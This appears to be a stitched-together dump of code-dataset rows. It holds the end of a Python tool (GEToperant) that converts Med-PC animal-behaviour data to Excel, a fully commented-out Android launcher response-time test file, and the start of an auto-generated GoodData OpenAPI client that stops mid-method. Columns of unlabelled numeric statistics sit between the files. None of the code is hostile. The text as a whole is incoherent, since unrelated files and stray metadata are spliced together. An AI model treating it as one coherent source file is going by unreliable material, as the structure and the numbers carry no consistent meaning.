    mainsheet.write(4, 7, 'Increment Element tells the program if more elements need to be extracted from an array, and if so, whether to collect every element, or every nth element.')
    mainsheet.write(5, 7, 'Stop Element tells the program when to stop extracting elements from an array. It is not needed if only collecting 1 element')
    mainsheet.write(6, 7, 'Label Start Value and Label Increment can be used to increment a label that is used for multiple elements')
    # One data row per converted profile entry.
    columns = (Label, LabelStartValue, LabelIncrement, ArrayVar,
               StartElement, ArrayIncrement, StopElement)
    for row in range(len(Label)):
        for col, data in enumerate(columns):
            mainsheet.write(row + 1, col, data[row])
    output.close()
### The main function
### ------------------------------------------------------------------
### Shared machinery for GEToperant's three output modes.  The original
### implementation repeated the profile reader, the Med-PC line parser
### and the sheet writer once per mode; they are factored out below so
### each exists exactly once.
### ------------------------------------------------------------------

### Letters of the 26 Med-PC data arrays.
_DATA_ARRAYS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'

### Workbook properties stamped on every exported file.
_OUTPUT_PROPERTIES = {
    'title': 'Med-PC Data',
    'subject': 'Animal behaviour',
    'category': 'Raw data',
    'comments': 'Extracted using GEToperant. GEToperant is free open source software. https://www.github.com/SKhoo'
}


def _read_profile(GETprofile):
    """Read a GEToperant profile (.xlsx, .xls or .mrp).

    Returns a dict of seven parallel lists keyed 'Label',
    'LabelStartValue', 'LabelIncrement', 'ArrayVar', 'StartElement',
    'ArrayIncrement' and 'StopElement', one entry per profile row
    (header row excluded).
    """
    Label = list()
    LabelStartValue = list()
    LabelIncrement = list()
    ArrayVar = list()
    StartElement = list()
    ArrayIncrement = list()
    StopElement = list()
    suffix = GETprofile.lower()
    if suffix.endswith('xlsx'):
        ### Modern Excel profile: one column per field, row 1 is headers.
        profilesheet = load_workbook(GETprofile).active
        for letter, target in (('A', Label), ('B', LabelStartValue),
                               ('C', LabelIncrement), ('D', ArrayVar),
                               ('E', StartElement), ('F', ArrayIncrement),
                               ('G', StopElement)):
            target.extend(cell.value for cell in profilesheet[letter][1:])
    elif suffix.endswith('xls'):
        ### Legacy Excel profile read through xlrd.  Cell reprs look like
        ### "text:'foo'", "number:5.0" or "empty:''"; values are pulled
        ### out of the repr exactly as the original implementation did.
        profile_xl = xlrd.open_workbook(GETprofile)
        profilesheet = profile_xl.sheet_by_name(profile_xl.sheet_names()[0])

        def cell_str(cell):
            # Text cell: take the part between the quotes of the repr.
            return str(cell).split("\'")[1]

        def cell_int(cell):
            # Numeric cell: repr is 'number:5.0'; go through float first.
            return int(float(str(cell).split(":")[1]))

        def cell_opt_int(cell, text_is_none=False):
            # Optional numeric cell: blank (and optionally text) cells map
            # to None.  Unrecognised cell types also map to None so the
            # seven lists can never fall out of step (the original
            # silently skipped such cells, desynchronizing the lists).
            rep = str(cell)
            if 'empty' in rep or (text_is_none and 'text' in rep):
                return None
            if 'number' in rep:
                return cell_int(cell)
            return None

        # Row 0 is the header row; nrows == 0 is simply an empty profile
        # (the original's max(range(nrows)) raised on an empty sheet).
        for r in range(1, profilesheet.nrows):
            Label.append(cell_str(profilesheet.cell(r, 0)))
            LabelStartValue.append(cell_opt_int(profilesheet.cell(r, 1)))
            LabelIncrement.append(cell_opt_int(profilesheet.cell(r, 2)))
            ArrayVar.append(cell_str(profilesheet.cell(r, 3)))
            StartElement.append(cell_int(profilesheet.cell(r, 4)))
            ArrayIncrement.append(cell_opt_int(profilesheet.cell(r, 5)))
            StopElement.append(cell_opt_int(profilesheet.cell(r, 6),
                                            text_is_none=True))
    elif suffix.endswith('mrp'):
        ### MPC2XL row profile: pairs of lines (label, then a target such
        ### as 'A(3)' or a comment marker).
        with open(GETprofile, 'r') as infile:
            rowprofile = infile.readlines()
        # Stop before the last line so an unpaired trailing label cannot
        # raise an IndexError.
        for i in range(0, len(rowprofile) - 1, 2):
            target_line = rowprofile[i + 1]
            ### For each label in the MRP, decide if it is a data value, if so, then import it
            if re.search(r'\D\(\d+\)', target_line) is not None:
                Label.append(rowprofile[i][:-1])
                LabelStartValue.append(None)
                LabelIncrement.append(None)
                ArrayVar.append(target_line[0])
                StartElement.append(int(re.search(r'\d+', target_line).group(0)))
                ArrayIncrement.append(0)
                StopElement.append(None)
            elif 'comment' in target_line.lower():
                Label.append(rowprofile[i][:-1])
                LabelStartValue.append(None)
                LabelIncrement.append(None)
                ArrayVar.append('Comments')
                StartElement.append(0)
                ArrayIncrement.append(0)
                StopElement.append(None)
    return {'Label': Label, 'LabelStartValue': LabelStartValue,
            'LabelIncrement': LabelIncrement, 'ArrayVar': ArrayVar,
            'StartElement': StartElement, 'ArrayIncrement': ArrayIncrement,
            'StopElement': StopElement}


def _new_record():
    """Create an empty record of header fields, comments and data arrays.

    Replaces the original's 26 letter-named local lists accessed through
    eval(); the arrays live in a plain dict keyed by letter instead.
    """
    return {'Filenames': list(), 'Startdate': list(), 'Enddate': list(),
            'Subject': list(), 'Experiment': list(), 'Group': list(),
            'Box': list(), 'Starttime': list(), 'Endtime': list(),
            'MSN': list(), 'Comments': list(),
            'arrays': {letter: list() for letter in _DATA_ARRAYS}}


def _parse_mpc_lines(mpc_lines, record, use_shortpath=False):
    """Parse the lines of one Med-PC data file into *record*, in place.

    use_shortpath: when a subject block lacks its own 'File' header,
    reuse the name from the most recent 'File' line ('Main' mode)
    instead of appending None ('Sheets'/'Books' modes).
    """
    arrays = record['arrays']
    values = list()      # rows of the array currently being collected
    currentarray = ''    # letter of the array currently being collected
    shortpath = ''
    line = ''            # survives the loop for the final tie-off check

    def flush_values():
        # Flatten any collected rows into one list and store them on the
        # current array.
        nonlocal values
        if len(values) > 0:
            arrays[currentarray].append(
                list(itertools.chain.from_iterable(values)))
            values = list()

    def end_of_subject():
        # Close out the current subject: store any open array and keep
        # Comments and every data array at one entry per subject.
        flush_values()
        if len(record['Startdate']) > len(record['Comments']):
            record['Comments'].append(None)
        for letter in _DATA_ARRAYS:
            if len(arrays[letter]) < len(record['Startdate']):
                arrays[letter].append(list())

    for line in mpc_lines:
        # Begin by collecting the headers.
        if 'File' in line:
            record['Filenames'].append(line[6:-1])
            shortpath = line.split('\\')[-1]
        # Collect the start and end dates in ISO 8601 format, correcting
        # for a lack of Y2KCOMPLIANT: two-digit years are 21st century.
        elif 'Start Date' in line:
            if len(line) < 22:
                record['Startdate'].append("20"+line[18:-1]+"-"+line[12:14]+"-"+line[15:17])
            else:
                record['Startdate'].append(line[18:-1]+"-"+line[12:14]+"-"+line[15:17])
            if len(record['Startdate']) > len(record['Filenames']):
                record['Filenames'].append(shortpath if use_shortpath else None)
        elif 'End Date' in line:
            if len(line) < 20:
                record['Enddate'].append("20"+line[16:-1]+"-"+line[10:12]+"-"+line[13:15])
            else:
                record['Enddate'].append(line[16:-1]+"-"+line[10:12]+"-"+line[13:15])
        # Similarly, collect subject, experiment, group, box, start time,
        # end time and program name.
        elif 'Subject' in line:
            record['Subject'].append(line[9:-1])
        elif 'Experiment' in line:
            record['Experiment'].append(line[12:-1])
        elif 'Group' in line:
            record['Group'].append(line[7:-1])
        elif 'Box' in line:
            record['Box'].append(line[5:-1])
        elif 'Start Time' in line:
            # Single-digit hours are padded with an extra space.
            record['Starttime'].append(line[13:-1] if line[12] == ' ' else line[12:-1])
        elif 'End Time' in line:
            record['Endtime'].append(line[11:-1] if line[10] == ' ' else line[10:-1])
        elif 'MSN' in line:
            record['MSN'].append(line[5:-1])
        elif len(line) > 1:
            if re.search(r'\D:', line) is not None and line[0:1] != '\\':
                # A new array header: dump the previous array first.
                flush_values()
                currentarray = line[0]
                if re.search(r'\d', line) is not None:
                    # Single-value variable printed on the header line
                    # itself, e.g. 'X:     5.000'.
                    arrays[currentarray].append([line.split()[1]])
            elif line[0:1] == '\\':
                # A comment line: close any open array, then record it.
                flush_values()
                record['Comments'].append(line[1:-1])
            else:
                # A row of array values; the first token is the element
                # index within the array and is discarded.
                values.append(line.split()[1:])
        elif line == '\n' or len(line) < 1:
            end_of_subject()
    # Tie off the loose ends if the file did not end on a blank line.
    if len(line) > 1:
        end_of_subject()


def _write_sheet(mainsheet, profile, record, header_flags):
    """Write the exported header rows and profiled data to *mainsheet*.

    header_flags is a sequence of (flag, row title, record key) tuples in
    output order; a row is written when its flag equals 1.  Box values
    are written as numbers, all other headers as text.
    """
    mainsheet.set_column('A:A', 15)
    lastrow = -1
    for flag, title, key in header_flags:
        if flag == 1:
            lastrow = lastrow + 1
            mainsheet.write(lastrow, 0, title)
            # Iterating the row's own list fixes the original's use of
            # len(Subject) to index Experiment.
            for col, value in enumerate(record[key]):
                mainsheet.write(lastrow, col + 1,
                                float(value) if key == 'Box' else value)
    arrays = record['arrays']
    subjects = len(record['Subject'])
    comments = record['Comments']
    ### Loop over the profile.  Each label is either
    ### 1. a single element extraction,
    ### 2. a partial array extraction, or
    ### 3. a full array extraction.
    for i in range(len(profile['Label'])):
        label = profile['Label'][i]
        arrayvar = profile['ArrayVar'][i]
        start = profile['StartElement'][i]
        # A blank increment cell (None, from the .xls reader) means a
        # single-element extraction; the original's 'None < 1' comparison
        # raises a TypeError on Python 3.
        increment = profile['ArrayIncrement'][i] or 0
        stop = profile['StopElement'][i]
        if increment < 1:
            ### 1. Single element extraction takes only the label.
            lastrow = lastrow + 1
            mainsheet.write(lastrow, 0, label)
            if 'comment' in arrayvar.lower():
                for k in range(subjects):
                    mainsheet.write(lastrow, k + 1,
                                    comments[k] if k < len(comments) else None)
            else:
                data = arrays[arrayvar]
                for k in range(subjects):
                    # Guarding k against len(data) fixes an IndexError when
                    # an array has fewer entries than there are subjects.
                    if k < len(data) and start < len(data[k]):
                        mainsheet.write(lastrow, k + 1, float(data[k][start]))
                    else:
                        mainsheet.write(lastrow, k + 1, None)
        else:
            ### 2./3. Partial or full array extraction.  Fall back to a
            ### full extraction when no usable stop element is given (the
            ### original left 'steps' undefined when stop <= start) or
            ### when the stop exceeds the longest collected array.
            data = arrays[arrayvar]
            longest = max((len(subject_data) for subject_data in data),
                          default=0)
            if (stop is None or isinstance(stop, str)
                    or stop <= start or longest < stop + 1):
                steps = range(start, longest, increment)
            else:
                steps = range(start, stop + 1, increment)
            label_start = profile['LabelStartValue'][i]
            label_inc = profile['LabelIncrement'][i]
            for x in steps:
                lastrow = lastrow + 1
                if label_inc is not None and label_inc > 0:
                    # Number repeated labels, e.g. 'Bin 1', 'Bin 2', ...
                    mainsheet.write(lastrow, 0, label + ' ' + str(
                        label_start + int((x - start) / increment) * label_inc))
                else:
                    mainsheet.write(lastrow, 0, label)
                for k in range(subjects):
                    if k < len(data) and x < len(data[k]):
                        mainsheet.write(lastrow, k + 1, float(data[k][x]))
                    else:
                        mainsheet.write(lastrow, k + 1, None)


### The main function
def GEToperant(GETprofile, MPCdatafiles, outputfile,
               exportfilename = 1,
               exportstartdate = 1,
               exportenddate = 1,
               exportsubject = 1,
               exportexperiment = 1,
               exportgroup = 1,
               exportbox = 1,
               exportstarttime = 1,
               exportendtime = 1,
               exportmsn = 1,
               mode = 'Main'):
    '''
    GEToperant takes three main arguments:
        GETprofile, which must be a GEToperant Excel profile or an MRP
        MPCdatafiles, which must be a list of one or more Med-PC data files
        outputfile, which must be an Excel file ('Main' and 'Sheets'
        modes) or an output directory ('Books' mode)
    It takes another 10 arguments relating to what headers to export
    and how to export the data.
    GEToperant will read the data from the MPCdatafiles and will
    output the headers and the data described in GETprofile. It will
    save this in the Excel file specified by outputfile.
    mode selects the layout: 'Main' puts every file side by side on one
    sheet, 'Sheets' gives each file its own sheet, and 'Books' gives
    each file its own workbook inside the outputfile directory.
    Preconditions: The profile must be a GEToperant profile or MRP.
    If writing to 'Sheets', the file names cannot have illegal characters: ' [ ] : * ? / \\ '
    '''
    ### Read the data profile into seven parallel lists.
    profile = _read_profile(GETprofile)
    # Header rows, in output order: (enable flag, row title, record key).
    header_flags = [
        (exportfilename, 'Filename', 'Filenames'),
        (exportstartdate, 'Start Date', 'Startdate'),
        (exportenddate, 'End Date', 'Enddate'),
        (exportsubject, 'Subject', 'Subject'),
        (exportexperiment, 'Experiment', 'Experiment'),
        (exportgroup, 'Group', 'Group'),
        (exportbox, 'Box', 'Box'),
        (exportstarttime, 'Start Time', 'Starttime'),
        (exportendtime, 'End Time', 'Endtime'),
        (exportmsn, 'MSN', 'MSN'),
    ]
    if mode == 'Main':
        ### All files merge into one record and one worksheet.
        record = _new_record()
        for datafile in MPCdatafiles:
            # Each file is opened with a context manager (the original
            # leaked every handle) and finalized independently, so a file
            # lacking a trailing blank line cannot bleed into the next.
            with open(datafile, 'r') as infile:
                _parse_mpc_lines(infile.readlines(), record,
                                 use_shortpath=True)
        output = xlsxwriter.Workbook(outputfile)
        output.set_properties(dict(_OUTPUT_PROPERTIES))
        _write_sheet(output.add_worksheet('GEToperant output'),
                     profile, record, header_flags)
        output.close()
    elif mode == 'Sheets':
        ### One workbook; each file becomes its own worksheet.
        output = xlsxwriter.Workbook(outputfile)
        output.set_properties(dict(_OUTPUT_PROPERTIES))
        for datafile in MPCdatafiles:
            # Sheet names come from the file name, capped at Excel's
            # 31-character sheet-name limit.
            sheetname = datafile.split('/')[-1]
            if len(sheetname) >= 32:
                sheetname = sheetname[:31]
            record = _new_record()
            with open(datafile, 'r') as infile:
                _parse_mpc_lines(infile.readlines(), record)
            _write_sheet(output.add_worksheet(sheetname),
                         profile, record, header_flags)
        output.close()
    elif mode == 'Books':
        ### One workbook per file inside the outputfile directory.
        for datafile in MPCdatafiles:
            record = _new_record()
            with open(datafile, 'r') as infile:
                _parse_mpc_lines(infile.readlines(), record)
            fullpath = outputfile + '/' + datafile.split('/')[-1] + '.xlsx'
            output = xlsxwriter.Workbook(fullpath)
            output.set_properties(dict(_OUTPUT_PROPERTIES))
            _write_sheet(output.add_worksheet('GEToperant output'),
                         profile, record, header_flags)
            # Close inside the loop: xlsxwriter only writes the workbook
            # to disk on close.
            output.close()
| 44.328215
| 185
| 0.468846
| 4,878
| 46,190
| 4.427224
| 0.072776
| 0.070013
| 0.084599
| 0.03973
| 0.829505
| 0.807418
| 0.797462
| 0.783756
| 0.783756
| 0.783756
| 0
| 0.024598
| 0.42087
| 46,190
| 1,041
| 186
| 44.370797
| 0.782729
| 0.121541
| 0
| 0.859544
| 0
| 0.002401
| 0.054236
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002401
| false
| 0
| 0.006002
| 0
| 0.008403
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1b35461cf6a6e316af92526384bd3102c452ca36
| 11,415
|
py
|
Python
|
example/test_launcher/test_hilauncher_response_time.py
|
bentonq-yi/casium
|
ee0bdd5b9600db6149f4ae9b9e38aae5ff38e601
|
[
"Apache-2.0"
] | 1
|
2017-11-09T09:01:51.000Z
|
2017-11-09T09:01:51.000Z
|
example/test_launcher/test_hilauncher_response_time.py
|
bentonq-yi/casium
|
ee0bdd5b9600db6149f4ae9b9e38aae5ff38e601
|
[
"Apache-2.0"
] | null | null | null |
example/test_launcher/test_hilauncher_response_time.py
|
bentonq-yi/casium
|
ee0bdd5b9600db6149f4ae9b9e38aae5ff38e601
|
[
"Apache-2.0"
] | null | null | null |
# from selenium.common.exceptions import NoSuchElementException
#
# from roboui import Device, By
# from test_launcher.launcher import Launcher
#
# PACKAGE_HILAUNCHER = 'com.transsion.hilauncher'
# PACKAGE_CONTACTS = 'com.android.contacts'
# PACKAGE_MESSAGES = 'com.android.mms'
# PACKAGE_CAMERA = 'com.mediatek.camera'
# PACKAGE_SETTINGS = 'com.android.settings'
# PACKAGE_BROWSER = 'com.transsion.phoenix'
# PACKAGE_PICTURE = 'com.android.gallery3d'
#
# TEST_STEP_APP_OPEN = 0
# TEST_STEP_APP_CLOSE = 1
# CLOSE_METHOD_PRESS_BACK = 0
# CLOSE_METHOD_PRESS_HOME = 1
#
#
# VIEW_GROUP = 'android.view.ViewGroup'
#
# def test_contact_open(repeat_count, systrace_info):
# launch_app_and_collect_systrace('Contacts', PACKAGE_CONTACTS, repeat_count, systrace_info, TEST_STEP_APP_OPEN, CLOSE_METHOD_PRESS_BACK)
#
# def test_contact_close_by_back(repeat_count, systrace_info):
# launch_app_and_collect_systrace('Contacts', PACKAGE_HILAUNCHER, repeat_count, systrace_info, TEST_STEP_APP_CLOSE, CLOSE_METHOD_PRESS_BACK)
#
# def test_contact_close_by_home(repeat_count, systrace_info):
# launch_app_and_collect_systrace('Contacts', PACKAGE_HILAUNCHER, repeat_count, systrace_info, TEST_STEP_APP_CLOSE, CLOSE_METHOD_PRESS_HOME)
#
# def test_messages_open(repeat_count, systrace_info):
# launch_app_and_collect_systrace('Messages', PACKAGE_MESSAGES, repeat_count, systrace_info, TEST_STEP_APP_OPEN, CLOSE_METHOD_PRESS_BACK)
#
# def test_messages_close_by_back(repeat_count, systrace_info):
# launch_app_and_collect_systrace('Messages', PACKAGE_HILAUNCHER, repeat_count, systrace_info, TEST_STEP_APP_CLOSE, CLOSE_METHOD_PRESS_BACK)
#
# def test_messages_close_by_home(repeat_count, systrace_info):
# launch_app_and_collect_systrace('Messages', PACKAGE_HILAUNCHER, repeat_count, systrace_info, TEST_STEP_APP_CLOSE, CLOSE_METHOD_PRESS_HOME)
#
# def test_camera_open(repeat_count, systrace_info):
# launch_app_and_collect_systrace('Camera', PACKAGE_CAMERA, repeat_count, systrace_info, TEST_STEP_APP_OPEN, CLOSE_METHOD_PRESS_BACK)
#
# def test_camera_close_by_back(repeat_count, systrace_info):
# launch_app_and_collect_systrace('Camera', PACKAGE_HILAUNCHER, repeat_count, systrace_info, TEST_STEP_APP_CLOSE, CLOSE_METHOD_PRESS_BACK)
#
# def test_camera_close_by_home(repeat_count, systrace_info):
# launch_app_and_collect_systrace('Camera', PACKAGE_HILAUNCHER, repeat_count, systrace_info, TEST_STEP_APP_CLOSE, CLOSE_METHOD_PRESS_HOME)
#
# def test_settings_open(repeat_count, systrace_info):
# launch_app_and_collect_systrace('Settings', PACKAGE_SETTINGS, repeat_count, systrace_info, TEST_STEP_APP_OPEN, CLOSE_METHOD_PRESS_BACK)
#
# def test_settings_close_by_back(repeat_count, systrace_info):
# launch_app_and_collect_systrace('Settings', PACKAGE_HILAUNCHER, repeat_count, systrace_info, TEST_STEP_APP_CLOSE, CLOSE_METHOD_PRESS_BACK)
#
# def test_settings_close_by_home(repeat_count, systrace_info):
# launch_app_and_collect_systrace('Settings', PACKAGE_HILAUNCHER, repeat_count, systrace_info, TEST_STEP_APP_CLOSE, CLOSE_METHOD_PRESS_HOME)
#
# def test_browser_open(repeat_count, systrace_info):
# l = Launcher()
# d = Device()
# l.skip_all_guide()
# l.home()
# l.open_drawer()
# app = l.find_icon_in_drawer('PHX Browser')
# for i in range(repeat_count):
# systrace_info.systrace_begin(PACKAGE_BROWSER)
# app.click()
# systrace_info.systrace_end()
# d.press_back()
# d.find_element(By.text('CONFIRM')).click()
# l.home()
# l.home()
#
# def test_browser_close_by_back(repeat_count, systrace_info):
# l = Launcher()
# d = Device()
# l.skip_all_guide()
# l.home()
# l.open_drawer()
# app = l.find_icon_in_drawer('PHX Browser')
# for i in range(repeat_count):
# app.click()
# d.press_back()
# systrace_info.systrace_begin(PACKAGE_HILAUNCHER)
# d.find_element(By.text('CONFIRM')).click()
# systrace_info.systrace_end()
# l.home()
# l.home()
#
# def test_browser_close_by_home(repeat_count, systrace_info):
# launch_app_and_collect_systrace('PHX Browser', PACKAGE_HILAUNCHER, repeat_count, systrace_info, TEST_STEP_APP_CLOSE, CLOSE_METHOD_PRESS_HOME)
#
# def test_picture_open(repeat_count, systrace_info):
# launch_app_and_collect_systrace('My Picture', PACKAGE_PICTURE, repeat_count, systrace_info, TEST_STEP_APP_OPEN, CLOSE_METHOD_PRESS_BACK)
#
# def test_picture_close_by_back(repeat_count, systrace_info):
# launch_app_and_collect_systrace('My Picture', PACKAGE_HILAUNCHER, repeat_count, systrace_info, TEST_STEP_APP_CLOSE, CLOSE_METHOD_PRESS_BACK)
#
# def test_picture_close_by_home(repeat_count, systrace_info):
# launch_app_and_collect_systrace('My Picture', PACKAGE_HILAUNCHER, repeat_count, systrace_info, TEST_STEP_APP_CLOSE, CLOSE_METHOD_PRESS_HOME)
#
# def test_open_folder(repeat_count, systrace_info):
# l = Launcher()
# l.skip_all_guide()
# l.home()
# l.add_icon_to_page(0)
#
# d = Device()
# workspace = d.find_element(By.resource_id('workspace'))
#
# try:
# folder = workspace.find_element(By.description_starts_with('Folder:'))
# except NoSuchElementException:
# l = Launcher()
# l.create_folder(9)
# folder = workspace.find_element(By.description_starts_with('Folder:'))
#
# for i in range(repeat_count):
# systrace_info.systrace_begin(PACKAGE_HILAUNCHER)
# folder.click()
# systrace_info.systrace_end()
# d.press_back()
# d.press_home()
#
# def test_open_folder_add_apps_page(repeat_count, systrace_info):
# l = Launcher()
# l.skip_all_guide()
# l.home()
#
# d = Device()
# workspace = d.find_element(By.resource_id('workspace'))
# try:
# folder = workspace.find_element(By.description_starts_with('Folder:'))
# except NoSuchElementException:
# l.create_folder(9)
# folder = workspace.find_element(By.description_starts_with('Folder:'))
#
# for i in range(repeat_count):
# folder.click()
# systrace_info.systrace_begin(PACKAGE_HILAUNCHER)
# d.click(540.0 / 1080.0, 1689.0 / 1920.0)
# systrace_info.systrace_end()
# d.press_back()
# d.press_home()
#
# def test_open_option_menu(repeat_count, systrace_info):
# l = Launcher()
# l.skip_all_guide()
# l.home()
# l.add_icon_to_page(0)
#
# d = Device()
# workspace = d.find_element(By.resource_id('workspace'))
# app = workspace.find_element(By.xpath('//%s/android.widget.TextView[last()]' % VIEW_GROUP))
#
# for i in range(repeat_count):
# systrace_info.systrace_begin(PACKAGE_HILAUNCHER)
# app.long_click()
# systrace_info.systrace_end()
# d.press_back()
#
# def test_drawer_open(repeat_count, systrace_info):
# l = Launcher()
# l.skip_all_guide()
# l.home()
# l.add_icon_to_page(0)
#
# for i in range(repeat_count):
# systrace_info.systrace_begin(PACKAGE_HILAUNCHER)
# l.open_drawer()
# systrace_info.systrace_end()
# l.close_drawer()
#
# # TODO: the collected timing data is erroneous; investigate before relying on this test
# def test_enter_edit_mode_by_long_click(repeat_count, systrace_info):
# l = Launcher()
# l.skip_all_guide()
# l.home()
# l.add_icon_to_page(0)
#
# d = Device()
# for i in range(repeat_count):
# # enter edit mode by long click
# systrace_info.systrace_begin(PACKAGE_HILAUNCHER)
# l.enter_edit_mode()
# systrace_info.systrace_end()
# # exit edit mode
# d.press_back()
#
# def test_enter_a_z(repeat_count, systrace_info):
# launch_app_and_collect_systrace('A-Z', PACKAGE_HILAUNCHER, repeat_count, systrace_info, TEST_STEP_APP_OPEN, CLOSE_METHOD_PRESS_BACK)
#
# def test_enter_freezer(repeat_count, systrace_info):
# launch_app_and_collect_systrace('Freezer', PACKAGE_HILAUNCHER, repeat_count, systrace_info, TEST_STEP_APP_OPEN, CLOSE_METHOD_PRESS_BACK)
#
# def test_enter_freezer_add_list(repeat_count, systrace_info):
# l = Launcher()
# l.skip_all_guide()
# l.home()
# l.open_drawer()
# l.find_icon_in_drawer('Freezer').click()
#
# d = Device()
# # Unfreeze all
# has_more = True
# while has_more:
# l.find_icon_in_drawer('Freezer').click()
# try:
# app = d.find_element(By.resource_id('freezer_app_text'))
# if app.text != 'Add':
# app.click()
# d.find_element(By.text('OK')).click()
# d.wait()
# except NoSuchElementException:
# has_more = False
#
# l.find_icon_in_drawer('Freezer').click()
# for i in range(repeat_count):
# systrace_info.systrace_begin(PACKAGE_HILAUNCHER)
# d.find_element(By.text('Add')).click()
# systrace_info.systrace_end()
# d.press_back()
# l.home()
# l.home()
#
# def test_onekey_clean(repeat_count, systrace_info):
# l = Launcher()
# d = Device()
# l.skip_all_guide()
# l.home()
# try:
# d.find_element(By.resource_id('hios_clean_preview_background'))
# except NoSuchElementException:
# l.add_icon_to_page(0)
# l.clear_app_and_folder(0, count=1)
# l.open_widget_list()
# l.add_widget_from_list('Quick Accelerate')
# l.home()
# pass
#
# for i in range(repeat_count):
# systrace_info.systrace_begin(PACKAGE_HILAUNCHER)
# d.find_element(By.resource_id('hios_clean_preview_background')).click()
# systrace_info.systrace_end()
#
#
# def test_onekey_wallpapers(repeat_count, systrace_info):
# l = Launcher()
# d = Device()
# l.skip_all_guide()
# l.home()
# try:
# d.find_element(By.description_starts_with('Wallpaper Swap'))
# except NoSuchElementException:
# l.add_icon_to_page(0)
# l.clear_app_and_folder(0, count=1)
# l.open_widget_list()
# l.add_widget_from_list('Wallpaper Swap')
# l.home()
# pass
#
# for i in range(repeat_count):
# systrace_info.systrace_begin(PACKAGE_HILAUNCHER)
# d.find_element(By.description_starts_with('Wallpaper Swap')).click()
# systrace_info.systrace_end()
#
# # Common helper: clicks an app icon in the drawer and collects a systrace of the app launch or close.
# def launch_app_and_collect_systrace(app_name, app_package, repeat_count, systrace_info, test_step, close_method):
# l = Launcher()
# l.skip_all_guide()
# l.home()
# l.open_drawer()
# app = l.find_icon_in_drawer(app_name)
# for i in range(repeat_count):
# if test_step == TEST_STEP_APP_OPEN:
# systrace_info.systrace_begin(app_package)
# app.click()
# systrace_info.systrace_end()
# l.back()
# elif test_step == TEST_STEP_APP_CLOSE:
# if close_method == CLOSE_METHOD_PRESS_BACK:
# app.click()
# systrace_info.systrace_begin(app_package)
# l.back()
# systrace_info.systrace_end()
# elif close_method == CLOSE_METHOD_PRESS_HOME:
# app.click()
# systrace_info.systrace_begin(app_package)
# l.home()
# systrace_info.systrace_end()
# l.open_drawer()
# app = l.find_icon_in_drawer(app_name)
# l.home()
# l.home()
#
| 38.434343
| 147
| 0.69251
| 1,504
| 11,415
| 4.823138
| 0.087101
| 0.120761
| 0.141439
| 0.171216
| 0.838572
| 0.799283
| 0.762338
| 0.729666
| 0.719189
| 0.660325
| 0
| 0.003909
| 0.193167
| 11,415
| 296
| 148
| 38.564189
| 0.783713
| 0.9477
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0.003378
| null | 1
| null | true
| 0
| 0
| null | null | null | 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
1b5b6a8b294def1916f7e818d41a0436e2d23546
| 87,308
|
py
|
Python
|
gooddata-metadata-client/gooddata_metadata_client/api/declarative_layout_controller_api.py
|
jaceksan/gooddata-python-sdk
|
640bd8b679e00a5f0eb627bdf6143de078f8b59b
|
[
"MIT"
] | null | null | null |
gooddata-metadata-client/gooddata_metadata_client/api/declarative_layout_controller_api.py
|
jaceksan/gooddata-python-sdk
|
640bd8b679e00a5f0eb627bdf6143de078f8b59b
|
[
"MIT"
] | null | null | null |
gooddata-metadata-client/gooddata_metadata_client/api/declarative_layout_controller_api.py
|
jaceksan/gooddata-python-sdk
|
640bd8b679e00a5f0eb627bdf6143de078f8b59b
|
[
"MIT"
] | null | null | null |
"""
OpenAPI definition
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: v0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from gooddata_metadata_client.api_client import ApiClient, Endpoint as _Endpoint
from gooddata_metadata_client.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from gooddata_metadata_client.model.declarative_analytics import DeclarativeAnalytics
from gooddata_metadata_client.model.declarative_data_sources import DeclarativeDataSources
from gooddata_metadata_client.model.declarative_model import DeclarativeModel
from gooddata_metadata_client.model.declarative_organization import DeclarativeOrganization
from gooddata_metadata_client.model.declarative_user_groups import DeclarativeUserGroups
from gooddata_metadata_client.model.declarative_users import DeclarativeUsers
from gooddata_metadata_client.model.declarative_users_user_groups import DeclarativeUsersUserGroups
from gooddata_metadata_client.model.declarative_workspace_data_filters import DeclarativeWorkspaceDataFilters
from gooddata_metadata_client.model.declarative_workspace_model import DeclarativeWorkspaceModel
from gooddata_metadata_client.model.declarative_workspaces import DeclarativeWorkspaces
class DeclarativeLayoutControllerApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __get_analytics_model(
self,
workspace_id,
**kwargs
):
"""Get analytics model # noqa: E501
Retrieve current analytics model of the workspace. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_analytics_model(workspace_id, async_req=True)
>>> result = thread.get()
Args:
workspace_id (str):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DeclarativeAnalytics
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
